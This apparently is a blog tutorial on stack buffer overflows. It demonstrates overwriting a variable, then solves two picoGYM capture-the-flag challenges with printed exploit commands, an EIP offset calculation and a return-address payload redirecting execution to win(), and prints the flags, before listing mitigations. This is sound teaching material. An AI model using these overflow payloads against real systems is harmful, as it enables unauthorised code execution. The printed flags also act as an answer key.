Buffer overflow

“O’erstep not the modesty of nature.”

                                                                                                                        — Hamlet, Act III, Scene II

Buffer overflow, a vulnerability of the 2000s, happens when a larger size data is copied into a smaller sized buffer, this causes the data at other addresses to be overridden. This can allow execution of instructions not expected by the programmer.

In this blog we will discuss how buffer overflow works, solve few challenges in picoGYM and conclude with new features which prevent exploits by this vulnerability.

Note: All the below code is executed on an Ubuntu machine. For following the blog, it is recommended to have a LINUX distro or WSL installed.

Buffer overflow

Let's start by going through a basic example of what buffer overflow is by executing the below program

buffer overflow
buffer-overflow.c

For execution the program and check for the buffer overflow, we have to disable few protections (we will cover this in the last section of the blog) these include the canary -f-no-stack-protector, PIE (Position Independent Executable) -no-pie and -fno-pic and allow execution of the code in stack -z execstack.

Compile and run the program on a LINUX machine using 
> gcc buffer-overflow.c -fno-stack-protector -fno-pic -no-pie -z execstack
> ./a.out

First we get the difference in address between a and buffer for my system it is 44 bytes this is due to the padding added by the system. Now we can modify the value of variable a. Don't believe? Try it, for the difference in address you got add one to it (for my system it is 44 + 1 = 45). Now let's execute:

> python3 -c "print(45 * 'a')" | ./a.out

The value of a you get is 97. Complete output for your reference:
> python3 -c "print('a' * 45)" | ./a.out
Difference: 44 bytes
Data: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Value of a: 97

So what happened? The buffer overflowed and the data was also written to the memory address of hence the value modified. We can also cause a segmentation fault by overriding the return address of the main function itself.

Challenges

Now let's solve our first challenge

Launch instance and download the binary and the source, lets begin the exploit
Checking the file type
> file vuln
vuln: ELF 32-bit LSB pie executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=b53f59f147e1b0b087a736016a44d1db6dee530c, for GNU/Linux 3.2.0, not stripped

> checksec --file=vuln

checking security properties
checking security properties challenge-1

Since there is no stack canary, we can overflow a buffer. Seeing the source code we find our flag to be displayed in the sigsegv_handler function which is triggered when there is a segmentation fault and we can cause a segmentation fault by overriding the return address which causes a reference to a memory location not mapped by the process. We can get the flag by spamming A's, the exact number will depend on the padding and there are ways to get it (we will do that in next challenge). The flag can be recovered by executing the below in the picoGYM Webshell
> python3 -c "print(32 * 'a')" | nc saturn.picoctf.net <YOUR_INSTANCE_PORT_NUMBER>

Flag recovered: picoCTF{ov3rfl0ws_ar3nt_that_bad_c5ca6248}


Launch instance and download the binary and the source, lets begin the exploit
Checking the file type
> file vuln
vuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=685b06b911b19065f27c2d369c18ed09fbadb543, for GNU/Linux 3.2.0, not stripped

> checksec --file=vuln

checking security properties
checking security properties challenge-2

Sine there is no stack canary and no PIE enabled, we can find the hardcoded value of the address of any function and populate the return address on the stack to jump to that function. An inspection into the  vuln.c gives us information that the function of interest is win(). How do we know the offset? There is a trick, we have to wisely choose our payload so that when we are able to get the contents of the EIP (Instruction pointer) we can calculate the offset and can append the return address at that position.

The payload which we will be using for getting the offset is aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaaa (we can cut this short as we are sure we will be able to overflow the buffer and overrite return address within 64bytes). Every 4 bytes of this payload are unique hence based on the value of the EIP we can find the offset, for this particular program it was 0x6161616c. This is because my system is Intel Little endian, so the MSB is to the left. The value translates to laaa, meaning the offset is 4 * (ascii(l) - ascii(a)) (You can remember this as a rule), which evaluates to 44. So the first 44 bytes are the offset and the next 4 bytes are the address of win(). For exploit we execute:

> gdb ./vuln
Please enter your string:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaa

> (gdb) info registers
eip      0x6161616c       0x6161616c

register info
register values

The offset calculated is 44, for getting the last 4 bytes of the payload,

> (gdb) disass win
0x080491f6 <+0>:    endbr32

The final payload is 44 * b"a" + b"\xf6\x91\x04\x08" (This is because of the little endian system we are exploiting)

> python3 -c 'import sys; sys.stdout.buffer.write(44 * b"a" + b"\xf6\x91\x04\x08\n")' | nc saturn.picoctf.net <YOUR_INSTANCE_PORT_NUMBER>

Flag recovered: picoCTF{addr3ss3s_ar3_3asy_6462ca2d}

New Practices

Now for the last session, we will just mention few techniques that mitigate these attacks, there are others which you can check out.

Canary stack protector: Each return address has a canary value above it so that if the buffer overflows and tries to write into the EIP, the canary alerts that its value is changed and terminates the program.

Position Independent Executable (PIE): Allows the kernel to randomize the location where the code will execute hence, we cannot use the hardcoded values we get form the disassembly code.

Check for bounds: The gets() function doesn't check for bounds, there are other alternatives to use which handle bounds.


Code for buffer overload: buffer-overload.c

Comments

Post a Comment

Popular posts from this blog

stdio Buffers

Building a compiler Part. 1 of 4 Getting Started with lex

Multithreaded wc